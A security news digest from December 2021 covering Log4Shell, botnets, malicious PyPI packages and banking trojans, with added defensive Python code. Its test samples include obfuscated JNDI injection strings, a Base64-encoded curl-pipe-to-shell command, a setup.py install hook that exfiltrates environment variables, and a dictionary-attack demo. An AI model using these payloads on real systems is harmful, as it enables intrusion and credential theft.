December 13, 2021

Fortify Security Team

Title: The U.S. CISA added 13 new vulnerabilities to the Known Exploited Vulnerabilities Catalog, including Apache Log4Shell Log4j and Fortinet FortiOS issues.

Date Published: December 13, 2021

https://securityaffairs.co/wordpress/125577/security/log4shell-known-exploited-vulnerabilities-catalog.html

Excerpt: “The CVE-2021-44228 flaw made the headlines last week, after Chinese security researcher p0rz9 publicly disclosed a proof-of-concept exploit for the critical remote code execution zero-day vulnerability (aka Log4Shell) that affects the Apache Log4j Java-based logging library. The impact of the issue is devastating: thousands of organizations worldwide are potentially exposed to attacks, and security experts have already reported exploitation attempts in the wild. CISA also warns of a recently disclosed arbitrary file download vulnerability in FortiOS, tracked as CVE-2021-44168, that is actively exploited.”

Title: Log4j Flaw: Attackers Are Making Thousands of Attempts to Exploit This Severe Vulnerability

Date Published: December 13, 2021

https://www.zdnet.com/article/log4j-flaw-attackers-are-making-thousands-of-attempts-to-exploit-this-severe-vulnerability/

Excerpt: “Meanwhile, cybersecurity researchers at Sophos have warned that they’ve detected hundreds of thousands of attempts to remotely execute code using the Log4j vulnerability in the days since it was publicly disclosed, along with scans searching for the vulnerability. There are already active examples of attackers attempting to leverage Log4j vulnerabilities to install cryptocurrency-mining malware, while there are also reports of several botnets, including Mirai, Tsunami, and Kinsing, that are making attempts to leverage it. Researchers at Microsoft have also warned about attacks attempting to take advantage of Log4j vulnerabilities, including a range of crypto mining malware, as well as active attempts to install Cobalt Strike on vulnerable systems, something that could allow attackers to steal usernames and passwords.”

Title: Two Linux Botnets Already Exploit log4shell Flaw in Log4j

Date Published: December 13, 2021

https://securityaffairs.co/wordpress/125562/malware/linux-botnets-log4shell-flaw.html

Excerpt: “The attackers used a .uy top-level domain for the C2 infrastructure, which is uncommon. The Muhstik variant used in the attacks includes a backdoor module, ldm, which adds an SSH backdoor public key to allow remote connections to the server. After the public key is added to the ~/.ssh/authorized_keys file, the attacker can directly log into the remote server without password authentication. Experts pointed out that Muhstik uses the TOR network for its reporting mechanism. “Before accessing the TOR network, Muhstik queries relay.l33t-ppl.inf through some publicly available DoH services. During this process, a number of DNS requests are generated.” reads the post published by NetLab 360.”
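The persistence step quoted above (a public key appended to ~/.ssh/authorized_keys) is cheap to check for on a suspected host. The following is an added example, not code from NetLab 360 or the article: it parses an authorized_keys file, including entries that carry options such as command="...", computes each key's OpenSSH-style SHA256 fingerprint, and reports any key that is not on an allowlist. The sample file, the key blobs and the allowlist are constructed for the example; the blobs are synthetic bytes in OpenSSH wire format, not real keys.

```python
"""Audit an OpenSSH authorized_keys file against an allowlist of key fingerprints.

Added example for the Muhstik persistence technique quoted above: the backdoor
appends its own public key to ~/.ssh/authorized_keys. The sample file below is
constructed; the key blobs are synthetic, not real keys.
"""
import base64
import binascii
import hashlib
import struct

KEY_TYPES = {
    "ssh-rsa", "ssh-ed25519", "ecdsa-sha2-nistp256", "ecdsa-sha2-nistp384",
    "ecdsa-sha2-nistp521", "sk-ssh-ed25519@openssh.com", "sk-ecdsa-sha2-nistp256@openssh.com",
}


def fingerprint(blob):
    """OpenSSH-style SHA256 fingerprint of a raw public-key blob (what ssh-keygen -l prints)."""
    digest = hashlib.sha256(blob).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def _split_options(line):
    """Options end at the first whitespace outside double quotes (command="..." may contain spaces)."""
    in_quote = False
    for i, ch in enumerate(line):
        if ch == '"':
            in_quote = not in_quote
        elif ch.isspace() and not in_quote:
            return line[:i], line[i:].lstrip()
    return line, ""


def parse_authorized_keys(text):
    """Return one dict per well-formed key line; comments, blanks and undecodable lines are skipped."""
    entries = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        options = ""
        if line.split(None, 1)[0] not in KEY_TYPES:
            options, line = _split_options(line)
        parts = line.split(None, 2)
        if len(parts) < 2 or parts[0] not in KEY_TYPES:
            continue
        try:
            blob = base64.b64decode(parts[1], validate=True)
        except (binascii.Error, ValueError):
            continue
        entries.append({
            "line": lineno,
            "options": options,
            "type": parts[0],
            "fingerprint": fingerprint(blob),
            "comment": parts[2] if len(parts) == 3 else "",
        })
    return entries


def find_unexpected(text, allowed_fingerprints):
    """Keys present in the file but not on the allowlist: candidates for a planted backdoor key."""
    return [e for e in parse_authorized_keys(text) if e["fingerprint"] not in allowed_fingerprints]


# --- constructed sample data (synthetic key blobs in OpenSSH wire format) ---
def _synthetic_blob(keytype, public_bytes):
    """string keytype || string public_bytes, the layout OpenSSH uses for an ed25519 public key."""
    return (struct.pack(">I", len(keytype)) + keytype.encode()
            + struct.pack(">I", len(public_bytes)) + public_bytes)


KNOWN_BLOB = _synthetic_blob("ssh-ed25519", bytes(range(32)))      # the admin's key
ROGUE_BLOB = _synthetic_blob("ssh-ed25519", bytes(range(32, 64)))  # key the backdoor appended
ALLOWLIST = {fingerprint(KNOWN_BLOB)}

SAMPLE_AUTHORIZED_KEYS = "\n".join([
    "# constructed sample, not taken from a real host",
    "ssh-ed25519 " + base64.b64encode(KNOWN_BLOB).decode() + " admin@workstation",
    'no-pty,command="/usr/bin/true" ssh-ed25519 ' + base64.b64encode(KNOWN_BLOB).decode() + " restricted@backup",
    "ssh-ed25519 " + base64.b64encode(ROGUE_BLOB).decode(),   # no comment: appended by the backdoor
    "ssh-ed25519 not-valid-base64!!! junk",                     # malformed line, ignored
])

if __name__ == "__main__":
    for e in find_unexpected(SAMPLE_AUTHORIZED_KEYS, ALLOWLIST):
        print(f"line {e['line']}: unexpected {e['type']} key {e['fingerprint']} comment={e['comment']!r}")
```

Comparing fingerprints rather than raw lines means a key re-added with different options or a new comment is still recognised, and the allowlist can be built directly from the output of ssh-keygen -lf on the keys you actually issued.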

Title: Hackers Start Pushing Malware in Worldwide log4shell Attacks

Date Published: December 12, 2021

https://www.bleepingcomputer.com/news/security/hackers-start-pushing-malware-in-worldwide-log4shell-attacks/

Excerpt: “As soon as the vulnerability was released, we saw threat actors exploiting the Log4Shell vulnerability to execute shell scripts that download and install various cryptominers, as shown below. The threat actors behind the Kinsing backdoor and cryptomining botnet are heavily abusing the Log4j vulnerability with Base64 encoded payloads that have the vulnerable server download and execute shell scripts. This shell script will remove competing malware from the vulnerable device and then download and install the Kinsing malware, which will begin mining for cryptocurrency.”
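The three Log4Shell items above (the CISA catalog entry, the Sophos/Microsoft exploitation reports, and the Kinsing Base64-encoded payloads) all come down to one thing a defender can act on: spotting ${jndi:...} lookups in inbound request data and logs, including the obfuscated forms attackers use to slip past naive string matching. The following detector is an added example, not code from any of the quoted articles. It URL-decodes the input, collapses nested ${lower:...}/${upper:...} lookups and ${x:-default} fallbacks the way Log4j's interpolator would, reports the JNDI scheme and target, and decodes a Base64 command when the target follows the /Basic/Command/Base64/<b64> path layout used by common JNDI exploit servers (that path layout is an assumption about the exploit tooling, not a property of Log4j). The log lines, addresses and command string are constructed.

```python
"""Spot Log4Shell (CVE-2021-44228) lookup strings in request or log text.

Added example, not code from the quoted articles. It undoes the common evasions
(URL encoding, nested ${lower:..}/${upper:..} lookups, ${x:-default} defaults),
reports the JNDI scheme and target, and decodes a Base64 command when the target
follows the /Basic/Command/Base64/<b64> layout used by common JNDI exploit
servers (an assumption about payload format, not a property of Log4j itself).
The sample log lines and addresses below are constructed.
"""
import base64
import binascii
import re
from urllib.parse import unquote

INNERMOST = re.compile(r"\$\{([^${}]*)\}")                    # a lookup with no nested lookup inside
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:\s*/{0,2}([^}]*)\}", re.IGNORECASE)
B64_CMD = re.compile(r"/Basic/Command/Base64/([A-Za-z0-9+/=]+)", re.IGNORECASE)


def _resolve(match):
    """Evaluate one innermost lookup the way Log4j's interpolator would, or keep it verbatim."""
    body = match.group(1)
    if body.lower().startswith("jndi:"):
        return match.group(0)            # the dangerous lookup itself: keep it for detection
    if ":-" in body:
        return body.split(":-", 1)[1]    # ${env:NOPE:-j} and ${::-j} both yield "j"
    low = body.lower()
    if low.startswith("lower:"):
        return body[6:].lower()
    if low.startswith("upper:"):
        return body[6:].upper()
    return match.group(0)                # unknown lookup (date:, sys:, ...): leave as-is


def normalize(text, max_rounds=20):
    """URL-decode, then collapse nested lookups from the inside out until nothing changes."""
    text = unquote(text)
    for _ in range(max_rounds):
        rewritten = INNERMOST.sub(_resolve, text)
        if rewritten == text:
            break
        text = rewritten
    return text


def scan_line(line, line_no=0):
    """Return one finding per JNDI lookup in the line, with any embedded Base64 command decoded."""
    findings = []
    for m in JNDI.finditer(normalize(line)):
        scheme, target = m.group(1).lower(), m.group(2)
        command = None
        b64 = B64_CMD.search(target)
        if b64:
            try:
                command = base64.b64decode(b64.group(1)).decode("utf-8", "replace")
            except (binascii.Error, ValueError):
                command = None
        findings.append({"line": line_no, "scheme": scheme, "target": target, "command": command})
    return findings


def scan(lines):
    """Run scan_line over an iterable of log lines, numbering them from 1."""
    findings = []
    for i, line in enumerate(lines, 1):
        findings.extend(scan_line(line, i))
    return findings


# --- constructed sample input (RFC 5737 test addresses; not real attacker infrastructure) ---
CONSTRUCTED_CMD = "curl -s http://198.51.100.7/lh.sh | sh"
_B64 = base64.b64encode(CONSTRUCTED_CMD.encode()).decode()
SAMPLE_LOG = [
    'GET / HTTP/1.1 UA="${jndi:ldap://198.51.100.7:1389/a}"',                        # plain form
    "${${lower:j}${lower:n}${lower:d}i:${lower:l}dap://198.51.100.7:1389/Basic/Command/Base64/" + _B64 + "}",
    "GET /?q=%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2F198.51.100.7%3A1099%2Fobj%7D HTTP/1.1",  # URL-encoded
    'GET /index.html HTTP/1.1 UA="Mozilla/5.0"',                                         # benign
    "pattern ${date:yyyy-MM-dd} in a config dump is not a JNDI lookup",                  # benign lookup
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"line {f['line']}: jndi:{f['scheme']} -> {f['target']}  command={f['command']!r}")
```

Matching only the literal string "jndi:" misses the second and third sample lines; normalising first is what makes a single pattern catch them. The decoded command is the artefact worth pivoting on in a hunt, since it names the staging host and script that every infected machine in that campaign will have fetched.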

Title: Arrest in Romania of a Ransomware Affiliate Scavenging for Sensitive Data

Date Published: December 13, 2021

https://www.bleepingcomputer.com/news/security/police-arrests-ransomware-affiliate-behind-high-profile-attacks/

Excerpt: “Romanian law enforcement authorities arrested a ransomware affiliate suspected of hacking and stealing sensitive info from the networks of multiple high-profile companies worldwide, including a large Romanian IT company with clients from the retail, energy, and utilities sectors. The 41-year-old Romanian national was arrested Monday morning at his home in Craiova, Romania, by the DIICOT (the Romanian Directorate for Investigating Organized Crime and Terrorism) and judicial police officers, on suspicions of unauthorized access to a computer system, unauthorized transfer of computer data, illegal interception of a computer transmission, and blackmail.”

Title: Malicious PyPI Packages with over 10,000 Downloads Taken Down

Date Published: December 13, 2021

https://www.bleepingcomputer.com/news/security/malicious-pypi-packages-with-over-10-000-downloads-taken-down/

Excerpt: “The Python Package Index (PyPI) registry has removed three malicious Python packages aimed at exfiltrating environment variables and dropping trojans on the infected machines. These malicious packages are estimated to have generated over 10,000 downloads and mirrors put together, according to the researchers’ report. This week, Andrew Scott, a developer and senior product manager at Palo Alto Networks, reported discovering three malicious Python packages on the PyPI open source registry.”
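The behaviour described above, a setup script that harvests environment variables and sends them out at install time, is mechanically recognisable before a package is ever installed. The following is an added example, not code from the report or from Palo Alto Networks: it parses a setup.py with Python's ast module and flags the combination of os.environ/os.getenv reads with outbound network calls or process execution, resolving import aliases so that from urllib.request import urlopen is still attributed to urllib. Both sample setup.py sources are constructed, and the collection host is an RFC 5737 test address.

```python
"""Static audit of a setup.py for install-time environment-variable exfiltration.

Added example, not code from the quoted report. It walks the AST and flags a
package whose setup script reads os.environ/os.getenv and also reaches the
network or spawns a process. Both sample setup.py sources below are constructed;
the host is an RFC 5737 test address.
"""
import ast

ENV_READS = {("os", "environ"), ("os", "getenv")}
NETWORK_ROOTS = {"urllib", "requests", "socket", "http", "httpx"}
EXEC_ROOTS = {"subprocess", "os"}
EXEC_LEAVES = {"system", "popen", "Popen", "run", "call", "check_output", "check_call"}


def _dotted(node):
    """Return 'a.b.c' for a Name/Attribute chain, or None for other callee expressions."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


class SetupAuditor(ast.NodeVisitor):
    def __init__(self):
        self.alias_root = {}     # local name -> top-level module it came from
        self.env_reads = []      # line numbers
        self.network = []        # (line, callee)
        self.execs = []          # (line, callee)

    def visit_Import(self, node):
        for a in node.names:
            self.alias_root[a.asname or a.name.split(".")[0]] = a.name.split(".")[0]
        self.generic_visit(node)

    def visit_ImportFrom(self, node):
        root = (node.module or "").split(".")[0]
        for a in node.names:
            self.alias_root[a.asname or a.name] = root
        self.generic_visit(node)

    def visit_Attribute(self, node):
        if isinstance(node.value, ast.Name):
            root = self.alias_root.get(node.value.id, node.value.id)
            if (root, node.attr) in ENV_READS:
                self.env_reads.append(node.lineno)
        self.generic_visit(node)

    def visit_Call(self, node):
        name = _dotted(node.func)
        if name:
            head, leaf = name.split(".")[0], name.rsplit(".", 1)[-1]
            root = self.alias_root.get(head, head)
            if root in NETWORK_ROOTS:
                self.network.append((node.lineno, name))
            elif (root in EXEC_ROOTS and leaf in EXEC_LEAVES) or name in ("exec", "eval"):
                self.execs.append((node.lineno, name))
        self.generic_visit(node)


def audit_setup_py(source):
    """Parse a setup.py and report what it touches; 'suspicious' pairs env reads with egress or exec."""
    auditor = SetupAuditor()
    auditor.visit(ast.parse(source))
    return {
        "env_reads": auditor.env_reads,
        "network": auditor.network,
        "execs": auditor.execs,
        "suspicious": bool(auditor.env_reads) and bool(auditor.network or auditor.execs),
    }


# --- constructed samples ---
MALICIOUS_SETUP = '''\
import os, json
from urllib.request import urlopen, Request
from setuptools import setup
from setuptools.command.install import install

class PostInstall(install):
    def run(self):
        install.run(self)
        payload = json.dumps(dict(os.environ)).encode()               # harvest every variable
        urlopen(Request("http://203.0.113.9/collect", data=payload))  # constructed host

setup(name="totally-legit", version="0.1", cmdclass={"install": PostInstall})
'''

BENIGN_SETUP = '''\
from setuptools import setup
setup(name="harmless", version="1.0", packages=["harmless"])
'''

if __name__ == "__main__":
    for label, src in (("malicious", MALICIOUS_SETUP), ("benign", BENIGN_SETUP)):
        print(label, audit_setup_py(src))
```

This is a triage heuristic, not proof: a dynamic string built from chr() calls or a payload hidden in a compiled extension will not show up as a call to urlopen, so a hit is a reason to read the package, and a clean result is not a reason to skip reading it.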

Title: TinyNuke Banking Malware Targets French Entities

Date Published: December 13, 2021

https://www.proofpoint.com/us/blog/threat-insight/tinynuke-banking-malware-targets-french-entities

Excerpt: “Proofpoint identified multiple recent campaigns leveraging invoice-themed lures to distribute the uncommonly observed TinyNuke malware. The activity marks a stark reappearance of this threat, which has not been seen with regularity since 2018. The campaigns target hundreds of customers in various industries including manufacturing, technology, construction, and business services. The campaigns use French language lures with invoice or other financial themes, and almost exclusively target French entities and companies with operations in France.”

Title: Microsoft Details Building Blocks of Widely Active Qakbot Banking Trojan

Date Published: December 13, 2021

https://thehackernews.com/2021/12/microsoft-details-building-blocks-of.html

Excerpt: “Infection chains associated with the multi-purpose Qakbot malware have been broken down into “distinct building blocks,” an effort that Microsoft said will help to proactively detect and block the threat in an effective manner. The Microsoft 365 Defender Threat Intelligence Team dubbed Qakbot a “customizable chameleon that adapts to suit the needs of the multiple threat actor groups that utilize it.” Qakbot is believed to be the creation of a financially motivated cybercriminal threat group known as Gold Lagoon. It is a prevalent information-stealing malware that, in recent years, has become a precursor to many critical and widespread ransomware attacks, offering a malware installation-as-a-service that enables many campaigns.”

Title: US, Australia and Japan Stump up for Subsea Cable between Nauru, Kiribati and Federated States of Micronesia

Date Published: December 12, 2021

https://www.zdnet.com/article/us-australia-and-japan-stump-up-for-subsea-cable-between-nauru-kiribati-and-federated-states-of-micronesia/

Excerpt: “The United States, Australia, and Japan have said they will provide funding for a new subsea cable to connect the Pacific island nations of Nauru, Kiribati, and Federated States of Micronesia (FSM). The new cable will connect the island containing the capital of Kiribati with Nauru and the island of Kosrae in FSM, before connecting with the Hantru-1 cable at the island of Pohnpei in FSM. A joint statement between the six nations said the cable would provide better connectivity to 100,000 people across the three Pacific nations.”

Title: Western Digital SanDisk SecureAccess Flaws Allow Brute Force and Dictionary Attacks

Date Published: December 11, 2021

https://securityaffairs.co/wordpress/125530/security/western-digital-sandisk-secureaccess-flaws.html

Excerpt: “The SanDisk SecureAccess software, now rebranded SanDisk PrivateAccess, allows storing and protecting critical and sensitive files on SanDisk USB flash drives. The access to the user’s private vault is protected by a personal password, and all the files are automatically encrypted. According to the vendor, SanDisk SecureAccess version 3.02 was using a one-way cryptographic hash with a predictable salt. This means that the software is vulnerable to dictionary attacks. The software also uses a password hash with insufficient computational effort; as a consequence, an attacker can brute-force user passwords, leading to unauthorized access to user data.”
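The two weaknesses named above (a predictable salt and a hash that costs too little to compute) compound each other: the constant salt lets an attacker hash a wordlist once and reuse the table against every vault, and the cheap hash makes building that table fast. The following is an added example, not the vendor's code and not a reconstruction of the actual SecureAccess format: weak_hash() models the construction the advisory describes, build_table() and crack_with_table() show why it falls to a dictionary attack, and strong_hash()/strong_verify() show the standard replacement, PBKDF2-HMAC-SHA256 with a random per-vault salt and a high iteration count. The fixed salt value and the wordlist are constructed.

```python
"""Why a predictable salt plus a cheap hash is breakable, and what the fix looks like.

Added example, not the vendor's code: weak_hash() models the construction the
advisory describes (one hash round over a salt the attacker can predict);
strong_hash() is the usual replacement (PBKDF2-HMAC-SHA256, random per-vault salt,
high iteration count). The fixed salt value and the wordlist are constructed.
"""
import hashlib
import hmac
import os

PREDICTABLE_SALT = b"fixed-salt"   # stands in for any constant or derivable salt (constructed value)


def weak_hash(password, salt=PREDICTABLE_SALT):
    """One SHA-256 over salt||password: the pattern the advisory criticises."""
    return hashlib.sha256(salt + password.encode()).hexdigest()


def build_table(wordlist, salt=PREDICTABLE_SALT):
    """Because the salt never changes, one hash per candidate cracks every vault that used it."""
    return {weak_hash(word, salt): word for word in wordlist}


def crack_with_table(stored_hex, table):
    """Dictionary attack against a weak_hash() value: a lookup, no hashing at attack time."""
    return table.get(stored_hex)


def strong_hash(password, salt=None, iterations=600_000):
    """PBKDF2-HMAC-SHA256 with a fresh 16-byte random salt; iterations set the work factor."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return {"salt": salt, "iterations": iterations, "hash": digest}


def strong_verify(password, record):
    """Recompute with the stored salt/iterations and compare in constant time."""
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), record["salt"], record["iterations"])
    return hmac.compare_digest(digest, record["hash"])


# --- constructed wordlist; a real attack would use a list of millions of entries ---
WORDLIST = ["123456", "password", "Summer2021!", "letmein", "qwerty"]

if __name__ == "__main__":
    table = build_table(WORDLIST)
    victim = weak_hash("Summer2021!")
    print("weak scheme, recovered:", crack_with_table(victim, table))
    a = strong_hash("Summer2021!", iterations=50_000)
    b = strong_hash("Summer2021!", iterations=50_000)
    print("same password, different salts ->", a["hash"] != b["hash"])
    print("work per guess relative to the weak scheme: x", a["iterations"])
```

With a random salt the precomputed table is useless (two vaults with the same password store different hashes), and with the iteration count each guess costs hundreds of thousands of HMAC rounds instead of one SHA-256, which is the "computational effort" the advisory says was missing.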
